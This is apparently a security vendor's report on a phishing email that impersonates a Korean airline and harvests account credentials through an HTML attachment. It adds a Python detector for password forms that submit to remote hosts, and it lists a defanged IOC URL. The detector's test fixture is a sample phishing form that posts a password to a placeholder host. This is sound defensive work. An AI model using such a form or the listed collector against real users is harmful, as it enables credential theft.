The ASEC analysis team has recently discovered a phishing email that impersonates a well-known Korean airline to collect user credentials. The email contains a notice about an airline ticket payment and lures the reader into connecting to a disguised phishing page. It includes specific ticket prices and details that imply the sender has background information about the reader.
The subject and the body of the email are shown below.

Figure 1. Subject and body of the email
When the attached HTML file is opened, a connection is made to a phishing page disguised as one of Korea’s well-known airlines.

Figure 2. Phishing page
The page presents itself as coming from the airline’s management support team and requires the victim to enter their account credentials and print the plane ticket as a PDF.

Figure 3. A part of the phishing site’s HTML code
When the user enters the password and clicks ‘View statement,’ the account credentials collected from the page are sent to the attacker’s server.

Figure 4. Sending account credentials
To prevent damage from phishing emails distributed under such an elaborate disguise, users need to exercise extra caution when viewing files attached to emails from unknown sources.
AhnLab currently blocks the domain related to this phishing page.
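One way to triage HTML attachments like the one described above, as an added example that is not ASEC's or AhnLab's code: it flags any form that contains a password field and submits to a remote host outside an allowlist. It assumes the attachment carries a plain `<form>` with an absolute `action` URL; the sample markup, the host `collector.example` and the function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormAudit(HTMLParser):
    """Collect each <form>'s action/method and whether it holds a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []        # one dict per <form> seen
        self._current = None   # form currently open, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "get").lower(),
                             "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_forms(html_text, trusted_hosts=()):
    """Return (host, method) for each password form posting to a remote, untrusted host."""
    audit = FormAudit()
    audit.feed(html_text)
    hits = []
    for form in audit.forms:
        # Relative actions have no hostname and are skipped.
        host = (urlparse(form["action"]).hostname or "").lower()
        if form["has_password"] and host and host not in trusted_hosts:
            hits.append((host, form["method"]))
    return hits


# Constructed sample attachment; the host is a placeholder, not the IOC from this report.
SAMPLE = """<html><body>
<form action="https://collector.example/collect.php" method="POST">
  <input type="email" name="user" value="reader@example.com">
  <input type="password" name="pass">
  <button>View statement</button>
</form></body></html>"""

if __name__ == "__main__":
    for host, method in suspicious_forms(SAMPLE):
        print(f"password form submits via {method.upper()} to {host}")
```

A mail gateway or analyst script can pass the organisation's own login hosts as `trusted_hosts` so that only forms submitting elsewhere are reported.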
[IOC Info]
- hxxps://ocostelaosantos[.]com.br/wp-content/plugins/vitor-teste/actions/crude/cross.php